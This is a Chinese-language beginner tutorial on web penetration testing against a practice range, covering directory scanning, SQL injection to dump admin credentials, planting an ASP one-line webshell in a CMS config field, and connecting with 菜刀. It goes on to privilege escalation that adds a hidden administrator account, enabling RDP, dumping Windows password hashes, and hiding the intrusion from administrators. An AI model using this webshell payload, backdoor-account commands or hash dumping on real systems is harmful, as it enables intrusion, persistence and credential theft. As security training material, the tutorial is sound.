web滲透測試常規套路

0x01

本篇文章旨在給小白白們做一次有關web滲透的科普，其中涉及到的套路、工具可能在如今XX狗、XX盾當道的社會已不再適用，但是其中涉及的思想永遠不會過時，其中的工具如菜刀等更是經典之作，即使發布已經10餘年認識現在滲透測試網站的不可或缺的利器之一。

另：面向學生的CTF，出題者考慮到學生的實操能力，設計的web題，或者拿伺服器找flag的大題大部分用本文介紹的思路、工具就能成功cpature the flag。

說明：此次環境來自某網站的靶場，因為比較經典，所以 筆者將以此為例介紹web滲透測試中需要涉及的套路、工具等。網路安全法出來了，剛入門的小白就不要去動真實的網站了，不然真是從入門到入獄了。

場景模擬：此刻你已獲權測試某網站，你將在接下來的一段時間裡進行測試，注意不要泄露網站敏感數據，所以接下里的所有圖片將會以打碼方式呈現

0x02

準備工作：

準備好以下工具：御劍、明小子、菜刀、pr、3389、cmd、quarkspwdump等

拿到一個網站，首先我們最容易想到的就是掃描目錄。

最常用的工具是御劍，頁面如圖

在域名空格中輸入我們測試的網站的域名，點擊開始掃描即可

我們在結果中發現/admin，這疑似後台頁面，雙擊該鏈接進入，看看判斷是否正確

可以看到確實是後台登陸頁面

找到後台登陸界面了，接下來我們就需要登陸的用戶名和密碼了，所以尋找用戶名和密碼就是我們下一步的工作

這一步我們用到的工具是Domain3.6，界面如圖

點擊SQL注入—》批量掃描注入點—》添加網址，輸入網址

點擊OK，然後點擊批量分析注入點

得到結果如圖

點擊OK關閉彈窗，在注入點欄目下隨機選擇一條，右擊選擇「檢測注入」

如圖所示

點擊「開始檢測」，得到結果如圖

點擊「猜解表名」

在結果中選擇admin

選中admin後點擊猜解列名

得到結果如圖

Username,password是我們需要的信息，所以在前面的方框中勾選，點擊猜解內容，如下圖

結果如下圖，成功得到用戶名和密碼

不過密碼很明顯是md5加密後的

我們在Md5在線解密網站中解密即可

得到結果，明文密碼為admin888

現在有了用戶名和密碼，我們就返回後台登陸頁面

輸入信息後成功登陸

成功進入後台

接下來我們需要獲取webshell，這一步仁者見仁智者見智，需要憑藉個人的經驗來多次嘗試分析確定

此處僅提供個人思路

我們點擊左側的「系統設置管理」—》「網站信息配置」

在公司名稱處將原信息刪除，換成我們的一句話木馬

"%><%Eval Request(Chr(35))%><%

（解釋：1.句首和句尾的引號用於閉合語句，2.Request()中的內容即連接菜刀時需要的密碼，此處用的Chr（35）指的是ascii值為35的符號，即#，3.Eval

點擊保存設置

接下來的步驟是連接菜刀

打開菜刀，界面如圖

在空白處右鍵，添加，在彈出框中輸入地址及密碼（之前說過為#）

這裡小白白們可能會問了，為什麼地址後面的/inc/config.asp之前沒有見過呢？

是這樣的，這個網站用的是魅力企業網站管理系統（一個cms），我們可以在網上下到它的源碼，可以看到它整個的目錄結構，自然會明白我們修改的一句話的目錄在/inc/config.asp

輸入信息後點擊添加，發現連接成功

注意：一般的CTF比賽，做到這個程度就可以在各個目錄里找flag了，不過這次我們把整個滲透流程介紹完

接下來我們需要提權，那麼就需要通過菜刀上傳提權工具，這裡上傳的位置要選好，一般而言，c盤的子目錄中的文件可執行的可能性較大

提權經典的搭配是cmd+3389+pr，我們這裡就用這個組合，同時選定上傳目錄為C:RECYCLER

直接將我們需要用到的工具pr,3389,cmd選中後拖進即可

可以看到已經上傳成功

選中cmd，右擊選擇虛擬終端，打開如圖所示頁面

敲回車後開始輸入我們的命令

來切換到我們提權工具所在的目錄

我們開始使用pr創建用戶，用法如圖

注意，雖然pr 「net user yale 888 /add」執行後提示命令成功完成，為了確認，我們可以輸入pr 「net user」確保確實成功添加該用戶（用戶名yale，密碼888）

接下來我們嘗試將yale添加到系統管理員組

同理，第二條命令是為了確保添加成功

既然添加成功了，我們接下來就開啟3389

我們win+r,打開運行框後輸入mstsc，打開遠程桌面連接

在空白框中輸入ip即可開始連接

點擊連接後彈出認證界面，輸入我們創建的用戶名和密碼

點擊確定即可成功登陸

接下來我們需要想到這個問題：以後遠程登陸難道及靠我們自己創建的帳號嗎？要是哪天被管理員發現了，那怎麼辦，所以長久之計是在獲取系統管理員的密碼後刪除自己創建的用戶

那麼，接下里我們要做的就是找到系統管理員的密碼

我們這裡用到的工具是quarksdump,還是和前三個工具一樣，拖到菜刀里直接上傳

我們在遠程連接的伺服器中打開cmd窗口

進入recycler目錄看到工具已上傳

輸入quarkspwdump.exe回車後立刻彈出如下窗口

輸入如圖命令，回車即可得到

我們看到最下面一列是Administrators跟隨的一串字元，這其實也是一串hash加密過的密碼值(Windows系統下的hash密碼格式為:用戶名稱:RID:LM-HASH值:NT-HASH值)，解密得到

密碼為cu9e2cgw

滲透測試結束。

0x03

總結：我們這次的演示是一次典型的滲透測試的過程，主要思路為

掃後台—找注入點獲取後台登陸密碼—上傳一句話木馬---菜刀連接—提權—拿伺服器獲取系統管理員密碼

用到的工具有：御劍、明小子、菜刀、pr、3389、cmd、quarkspwdump等

0x04

本文僅做技術分享及普及滲透流程之用，如有人企圖以此來進行不合法的滲透等破壞網路安全的行為與本文作者及合天智匯無任何關係。特此聲明。

註：本文屬合天智匯原創保護文章，未經允許，禁止轉載！